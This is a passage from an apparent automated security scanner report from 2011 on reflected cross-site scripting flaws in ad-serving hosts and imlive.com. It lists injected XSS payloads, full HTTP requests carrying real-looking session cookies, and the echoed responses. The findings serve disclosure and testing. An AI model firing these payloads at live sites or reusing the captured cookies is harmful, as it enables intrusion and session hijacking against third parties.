GET /servlet/ajrotatorab38f<script>alert(1)</script>fdc76c91cde/63723/0/vj?z=hpi&dim=63359&pos=1&pv=972835293505342&nc=23918955 HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: optin=Aa; ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X6003Csd
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 16:42:09 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /servlet/ajrotatorab38f<script>alert(1)</script>fdc76c91cde/63723/0/vj not found</pre> <BR>
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1bfba<script>alert(1)</script>20f5747086d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet1bfba<script>alert(1)</script>20f5747086d/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajcmp=20236X00631Sh00PZ; optin=Aa; i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 17:26:47 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /servlet1bfba<script>alert(1)</script>20f5747086d/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ not found</pre> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 82c11<script>alert(1)</script>7831f1e4291 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet/ajrotator82c11<script>alert(1)</script>7831f1e4291/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ajcmp=20236X00631Sh00PZ; optin=Aa; i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 17:26:48 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /servlet/ajrotator82c11<script>alert(1)</script>7831f1e4291/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ not found</pre> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b2558<script>alert(1)</script>78040661ac4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servletb2558<script>alert(1)</script>78040661ac4/ajrotator/63733/0/vj?z=hpi&dim=63352&pos=1&pv=7891522417776288&nc=72556237 HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Proxy-Connection: keep-alive Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X631Sh003KAA
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 17:24:06 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /servletb2558<script>alert(1)</script>78040661ac4/ajrotator/63733/0/vj not found</pre> <BR>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d8bcf<script>alert(1)</script>3fa33f2659 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servlet/ajrotatord8bcf<script>alert(1)</script>3fa33f2659/63733/0/vj?z=hpi&dim=63352&pos=1&pv=7891522417776288&nc=72556237 HTTP/1.1 Host: hpi.rotator.hadj7.adjuggler.net Proxy-Connection: keep-alive Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X631Sh003KAA
Response
HTTP/1.1 200 OK Server: JBird/1.0b Connection: close Date: Fri, 28 Jan 2011 17:24:07 GMT Content-Type: text/html
<H1>404 Not Found</H1> <pre>Resource /servlet/ajrotatord8bcf<script>alert(1)</script>3fa33f2659/63733/0/vj not found</pre> <BR>
The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fece'-alert(1)-'9f941c34489 was submitted in the cnd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ab?enc=K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA.&tt_code=nydailynews.com&udj=uf%28%27a%27%2C+537%2C+1296224069%29%3Buf%28%27c%27%2C+5740%2C+1296224069%29%3Buf%28%27r%27%2C+157830%2C+1296224069%29%3Bppv%28783%2C+%273218538236873087490%27%2C+1296224069%2C+1297520069%2C+5740%2C+25733%29%3B&cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI.2fece'-alert(1)-'9f941c34489&referrer=http://www.nydailynews.com/blogs70f75 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; uuid2=4760492999213801733; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=FzXN9?TZi)>y1-^s2mzPD+@4+<i:[v#mk@cE3+b8?jraDJt@%+`'uLM/Dl+8<5/!Ww5LUeE=7?vbgm<6zEk@/WBJ[MOl!9-@aXV4)=rJOM@R5(?)a%ZJ2Wcbf*>2GHpO^8q6y4.W-*y?$3o38q>cC^S[A.LeTUm`>tMe:Vn15)3V9!][_fmn.CQInWmsln_lnhV2sS:M5*3DU7fN@fu#Pa!9L%Hn?en]; sess=1
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 16:43:35 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:43:35 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:43:35 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:$78zsR5OeIufidQD2]*](K9'=5f>*@; path=/; expires=Thu, 28-Apr-2011 16:43:35 GMT; domain=.adnxs.com; HttpOnly Date: Fri, 28 Jan 2011 16:43:35 GMT Content-Length: 830
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71c05'%3balert(1)//97aa36e20df was submitted in the redir parameter. This input was echoed as 71c05';alert(1)//97aa36e20df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ptj?member=311&inv_code=cm.rev_bostonherald&size=300x250&referrer=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_bostonherald%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-48597195_1296251864%2C11d765b6a10b1b3%2CMiscellaneous%2Ccm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.sports_h-cm.weath_l-ex.32-ex.76-qc.a%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D199062%3Bcontx%3DMiscellaneous%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dcm.cm_aa_gn1%3Bbtg%3Dcm.sportsreg%3Bbtg%3Dcm.sportsfan%3Bbtg%3Dcm.de16_1%3Bbtg%3Dcm.de18_1%3Bbtg%3Dcm.sports_h%3Bbtg%3Dcm.weath_l%3Bbtg%3Dex.32%3Bbtg%3Dex.76%3Bbtg%3Dqc.a%3Bord%3D0.3579352851957083%3F71c05'%3balert(1)//97aa36e20df HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG3H<fQCe7?0P(*AuB-u**g1:XIC(WUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy6A3fm`:Idk3X!(*W2F2Hk''SykpRE%:434AnQ9O>WxYDWB13NOp+/5AIyhgU6ROEcF@:XJvR6qJ:uuL`8Q2Vw2t![$ph'S1S['D+Ir$>37Xp$KdW'FoQ)MSzM(Q66u2x%X_(L:Sjx('INuCClbQ^7w=#?jImiX^<V8sfuU'X?D5U]Q?rbY+o>Pj9!*^
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Sun, 30-Jan-2011 01:43:17 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:17 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Fri, 29-Apr-2011 01:43:17 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb675120=5_[r^208WMM2x@N!@@-#sWlnn?enc=fBSuR-F6xD8830-Nl27CPwAAAKCZmQFAPN9PjZduwj97FK5H4XrEP7pgRDqTLCxwBWHfHSmrEEK1cENNAAAAACQ9AwA3AQAAsQAAAAIAAAB4xgEA_14AAAEAAABVU0QAVVNEACwB-gCqAdQEnAgBAgUCAAIAAAAAISIIEAAAAAA.&tt_code=cm.rev_bostonherald&udj=uf%28%27a%27%2C+379%2C+1296265397%29%3Buf%28%27r%27%2C+116344%2C+1296265397%29%3B&cnd=!-xaQmAic0QEQ-IwHGAAg_70BKNQJMXsUrkfhesQ_QhMIABAAGAAgASj-__________8BSABQAFiqA2AAaLEB; path=/; expires=Sun, 30-Jan-2011 01:43:17 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=4760492999213801733; path=/; expires=Fri, 29-Apr-2011 01:43:17 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: anj=Kfu=8fG7vhfQCe7?0P(*AuB-u**g1:XIEABUM_+wOvA:V0Xn<7Dk!sP'/8IE4:I08s8L+#*oA2^^])F9fW1<Xs5$]sph#o'A%0UjcJy4l5Q%JvMB))2t*-IyS).d*U`>Ok$)gcuXD-L66R1@O4vp]ccG_H+%(u%mQtz*[d<.HEQ2b+)89LT/'^G@=+00].ps-rcmC0]*`Bb^`#V*AM6Ne*R5L=aW-ObhHV=.^C5BoO'uuJk8/]y:]wAdA6qeH?q7qFudKnD[)aHje%=uq$/OH'(wercy6M%TG:^q9-lPoF(NLxEz@; path=/; expires=Fri, 29-Apr-2011 01:43:17 GMT; domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sat, 29 Jan 2011 01:43:17 GMT Content-Length: 691
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dbd33"%3balert(1)//051cb26d260 was submitted in the mpck parameter. This input was echoed as dbd33";alert(1)//051cb26d260 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/14302/119028/social_ponder_728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-1%3Fmpt%3D3544685213dbd33"%3balert(1)//051cb26d260&mpt=3544685213&mpvc=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000951516/cstr=52769127=_4d436853,3544685213,766161^951516^1183^0,1_/xsxdata=$XSXDATA/bnum=52769127/optn=64?trg=&placementid=14302119028289011& HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=14302:28901/1551:17023/9609:2042/11293:3113
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:44:43 GMT Server: Apache Last-Modified: Tue, 28 Dec 2010 16:37:28 GMT ETag: "78afcc-cbd-4987b11732200" Accept-Ranges: bytes Content-Length: 6659 Content-Type: application/x-javascript
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45d90"%3balert(1)//ae69b85476 was submitted in the mpvc parameter. This input was echoed as 45d90";alert(1)//ae69b85476 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/14302/119028/social_ponder_728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-1%3Fmpt%3D3544685213&mpt=3544685213&mpvc=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000951516/cstr=52769127=_4d436853,3544685213,766161^951516^1183^0,1_/xsxdata=$XSXDATA/bnum=52769127/optn=64?trg=45d90"%3balert(1)//ae69b85476&placementid=14302119028289011& HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=14302:28901/1551:17023/9609:2042/11293:3113
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:44:53 GMT Server: Apache Last-Modified: Tue, 28 Dec 2010 16:37:28 GMT ETag: "78afcc-cbd-4987b11732200" Accept-Ranges: bytes Content-Length: 6622 Content-Type: application/x-javascript
The value of the placementid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fca98"%3balert(1)//f842bdb5210 was submitted in the placementid parameter. This input was echoed as fca98";alert(1)//f842bdb5210 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/14302/119028/social_ponder_728x90.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F14302-119028-28901-1%3Fmpt%3D3544685213&mpt=3544685213&mpvc=http://r1-ads.ace.advertising.com/click/site=0000766161/mnum=0000951516/cstr=52769127=_4d436853,3544685213,766161^951516^1183^0,1_/xsxdata=$XSXDATA/bnum=52769127/optn=64?trg=&placementid=14302119028289011fca98"%3balert(1)//f842bdb5210& HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=517004695355; mojo3=14302:28901/1551:17023/9609:2042/11293:3113
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 01:44:59 GMT Server: Apache Last-Modified: Tue, 28 Dec 2010 16:37:28 GMT ETag: "78afcc-cbd-4987b11732200" Accept-Ranges: bytes Content-Length: 6299 Content-Type: application/x-javascript
4.477. http://imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c04"><a>b9169bf5b73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /?99c04"><a>b9169bf5b73=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/?99c04"><a>b9169bf5b73=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
4.478. http://imlive.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://imlive.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 17713'-alert(1)-'0edf03efbd6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?17713'-alert(1)-'0edf03efbd6=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 652a8'onerror%3d'alert(1)'f61ce20483c was submitted in the REST URL parameter 1. This input was echoed as 652a8'onerror='alert(1)'f61ce20483c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /652a8'onerror%3d'alert(1)'f61ce20483c HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:56 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:56 GMT Connection: close Content-Length: 8302 Vary: Accept-Encoding
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
4.480. http://imlive.com/awardarena/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://imlive.com
Path:
/awardarena/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9ece"><a>e6c79bedc05 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
